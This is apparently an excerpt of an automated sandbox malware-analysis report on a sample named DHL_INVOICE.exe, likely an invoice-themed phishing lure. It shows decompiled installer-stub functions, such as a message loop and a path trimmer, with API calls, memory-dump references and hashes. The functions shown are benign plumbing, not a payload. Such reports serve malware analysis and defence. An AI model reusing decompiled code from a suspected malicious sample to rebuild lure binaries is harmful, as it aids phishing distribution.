                                                                            				E004054E8(0x404);
                                                                            				__imp__OleUninitialize();
                                                                            				return  *0x435acc;
                                                                            			}







                                                                            0x00405865
                                                                            0x0040586c
                                                                            0x00405874
                                                                            0x0040587a
                                                                            0x00405882
                                                                            0x00405889
                                                                            0x0040588b
                                                                            0x0040588e
                                                                            0x0040588e
                                                                            0x00405893
                                                                            0x00000000
                                                                            0x00405895
                                                                            0x00405895
                                                                            0x004058a2
                                                                            0x004058b0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004058a2
                                                                            0x00000000
                                                                            0x004058a4
                                                                            0x004058a4
                                                                            0x004058aa
                                                                            0x004058ae
                                                                            0x004058b6
                                                                            0x004058bb
                                                                            0x004058c0
                                                                            0x004058cd

                                                                            APIs
                                                                            • OleInitialize.OLE32(00000000), ref: 00405874
                                                                              • Part of subcall function 004054E8: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054FA
                                                                            • OleUninitialize.OLE32(00000404,00000000), ref: 004058C0
                                                                              • Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                              • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                            Strings
                                                                            • Somatopleural Setup: Installing, xrefs: 00405864
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$InitializeUninitialize
                                                                            • String ID: Somatopleural Setup: Installing
                                                                            • API String ID: 1011633862-52397148
                                                                            • Opcode ID: d3b477feca803d38b0fa0a9443a8adab0e946c85309316e9af7505676d23e992
                                                                            • Instruction ID: 6162ea9da32c9538b6d8593dc8e66a114e5892011aec6599076d88f80df4c0eb
                                                                            • Opcode Fuzzy Hash: d3b477feca803d38b0fa0a9443a8adab0e946c85309316e9af7505676d23e992
                                                                            • Instruction Fuzzy Hash: C5F0FA33500A009AF711B715AC02B6B73A8EB84705F08813EEE48A22A2E77948409B69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E0040620F(int _a4) {
                                                                            				struct tagMSG _v32;
                                                                            				int _t6;
                                                                            
                                                                            				while(1) {
                                                                            					_t2 =  &_a4; // 0x403579
                                                                            					_t6 = PeekMessageW( &_v32, 0, _a4,  *_t2, 1);
                                                                            					if(_t6 == 0) {
                                                                            						break;
                                                                            					}
                                                                            					DispatchMessageW( &_v32);
                                                                            				}
                                                                            				return _t6;
                                                                            			}





                                                                            0x00406221
                                                                            0x00406223
                                                                            0x0040622f
                                                                            0x00406237
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040621b
                                                                            0x0040621b
                                                                            0x0040623a

                                                                            APIs
                                                                            • DispatchMessageW.USER32(?), ref: 0040621B
                                                                            • PeekMessageW.USER32(?,00000000,?,y5@,00000001), ref: 0040622F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: Message$DispatchPeek
                                                                            • String ID: y5@
                                                                            • API String ID: 1770753511-1888225771
                                                                            • Opcode ID: 64ff892afa75a6f008d7101155dee183943c3d1907309ee94509adaab9142ef1
                                                                            • Instruction ID: a24ec92ef1b44bd1206bcd030c3399a913cbf723d0e0f52077422d22942c0190
                                                                            • Opcode Fuzzy Hash: 64ff892afa75a6f008d7101155dee183943c3d1907309ee94509adaab9142ef1
                                                                            • Instruction Fuzzy Hash: 41D0127194020ABBEF10AFE0DD09F9A7B6CAB54744F008475B701B5091D678D5258B59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 77%
                                                                            			E00406D10(WCHAR* _a4) {
                                                                            				WCHAR* _t5;
                                                                            				WCHAR* _t8;
                                                                            
                                                                            				_t8 = _a4;
                                                                            				_t5 =  &(_t8[lstrlenW(_t8)]);
                                                                            				while( *_t5 != 0x5c) {
                                                                            					_push(_t5);
                                                                            					_push(_t8);
                                                                            					_t5 = CharPrevW();
                                                                            					if(_t5 > _t8) {
                                                                            						continue;
                                                                            					}
                                                                            					break;
                                                                            				}
                                                                            				 *_t5 = 0;
                                                                            				return  &(_t5[1]);
                                                                            			}





                                                                            0x00406d11
                                                                            0x00406d1c
                                                                            0x00406d1f
                                                                            0x00406d25
                                                                            0x00406d26
                                                                            0x00406d27
                                                                            0x00406d2f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00406d2f
                                                                            0x00406d33
                                                                            0x00406d3a

                                                                            APIs
                                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403458,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL_INVOICE.exe,C:\Users\user\Desktop\DHL_INVOICE.exe,80000000,00000003,?,?,?,?,?), ref: 00406D16
                                                                            • CharPrevW.USER32(80000000,00000000,?,?,?,?,?), ref: 00406D27
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1081094876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.1081063184.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081164025.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081208739.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1081710560.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_DHL_INVOICE.jbxd
                                                                            Similarity
                                                                            • API ID: CharPrevlstrlen
                                                                            • String ID: C:\Users\user\Desktop
                                                                            • API String ID: 2709904686-3370423016
                                                                            • Opcode ID: ad5ea2724f566449118616985c1ca7d7286fc26986b3b6df7891a374239d9a00
                                                                            • Instruction ID: 44824fea6f3b9252f25675ab164e3effdf97f7511deaacd8752cc1a9fc297a0b
                                                                            • Opcode Fuzzy Hash: ad5ea2724f566449118616985c1ca7d7286fc26986b3b6df7891a374239d9a00
                                                                            • Instruction Fuzzy Hash: CBD05E31102531ABCB126B18DC059AF77B8EF41300306886AE542E7164C7785D92CBAD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%